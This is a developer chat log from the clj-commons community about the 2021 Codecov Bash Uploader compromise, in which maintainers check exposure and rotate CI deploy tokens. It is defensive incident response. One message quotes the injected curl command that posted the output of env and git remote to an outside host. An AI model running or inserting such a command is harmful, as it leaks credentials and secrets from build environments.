clj-commons

borkdude 2021-04-16T14:22:00.000400Z

re: code coverage, geez, I'm happy I disabled this service a while ago. https://www.security.nl/posting/699462/Script+softwarebedrijf+Codecov+twee+maandenlang+voorzien+van+malware

lread 2021-04-16T14:43:34.000900Z

From https://about.codecov.io/security-update/: > Out of an abundance of caution, if you used the Bash Uploaders between January 31, 2021 and April 1, 2021 and did not conduct a checksum validation of the Bash Uploader, we would suggest you re-roll all of your credentials, tokens, or keys located in the environment variables in your CI process.

lread 2021-04-16T14:45:44.001500Z

Note: I do use codecov from clj-commons/rewrite-clj.

borkdude 2021-04-16T14:47:57.001800Z

And did you get an e-mail? Or did you not use this script?

lread 2021-04-16T14:51:05.004300Z

Yup, https://github.com/clj-commons/rewrite-clj/blob/7621126caae5f21dc5150d52a6c9b747dc0aeeff/.github/workflows/code-coverage.yml#L49. Since this is a clj-commons project it might not be me who would get an email.

borkdude 2021-04-16T14:51:33.005100Z

Perhaps someone else got an e-mail, @slipset?

lread 2021-04-16T14:53:20.006100Z

But I also used it for rewrite-cljc I think during their window of infection… still no email… so… but they are recommending an update of credentials regardless…

lread 2021-04-16T14:55:27.006600Z

Their bash script was altered to upload the env vars: > curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://<redacted>/upload/v2 || true

borkdude 2021-04-16T14:55:37.006800Z

:(

borkdude 2021-04-16T14:55:48.007100Z

do you have sensitive env vars set in those projects?

borkdude 2021-04-16T14:55:52.007300Z

e.g. clojars deploy tokens?

lread 2021-04-16T14:56:38.008200Z

Ya… there are the CLOJARS tokens. I’ll refresh those. Not sure what else I need to change for GitHub Actions.

lread 2021-04-16T14:58:00.008800Z

I’ll review codecov docs to see if they’ve updated how their uploader script should be used as well.

lread 2021-04-16T15:02:10.009500Z

Ya they https://docs.codecov.io/docs/about-the-codecov-bash-uploader#validating-the-bash-script script now. I’ll also add that in.

lread 2021-04-16T16:18:21.012200Z

Ok, there’s also a newish feature up on GitHub. You can create an environment for a repo. This environment can hold secrets and can be referenced by a GitHub Actions workflow. So I deleted the repo-scoped deployment secrets, and now have a release environment that only the release workflow has access to.

borkdude 2021-04-16T16:25:30.014100Z

👍

slipset 2021-04-16T18:20:19.016Z

I did get the email. I guess I need to cycle the Clojars token we use for deploys. Possibly also the cert I use for signing artefacts.

borkdude 2021-04-16T18:24:24.016400Z

eh yes....

borkdude 2021-04-16T18:24:41.016700Z

the entire clj-commons could be compromised this way?

slipset 2021-04-16T18:36:58.020100Z

Ah, but no. rewrite-clj uses github actions, none of the other clj-commons projects do that. They use circle. And none of the other clj-commons projects use codecov

lread 2021-04-16T18:37:34.020900Z

I’ve already cycled deploy tokens for rewrite-clj

borkdude 2021-04-16T18:37:39.021Z

@slipset but none of the rewrite-clj secrets, etc are used in other projects? like the cert?

slipset 2021-04-16T18:39:15.023100Z

Nope. Rewrite doesn’t sign AFAIK, and the deploy tokens are generated by @lee, so they are different from the the ones I use.

lread 2021-04-16T18:39:35.023400Z

Yup, correct, rewrite-clj does not sign.

borkdude 2021-04-16T18:45:24.023600Z

ok, all good then, thanks

slipset 2021-04-16T18:45:40.024100Z

Thank you for checking.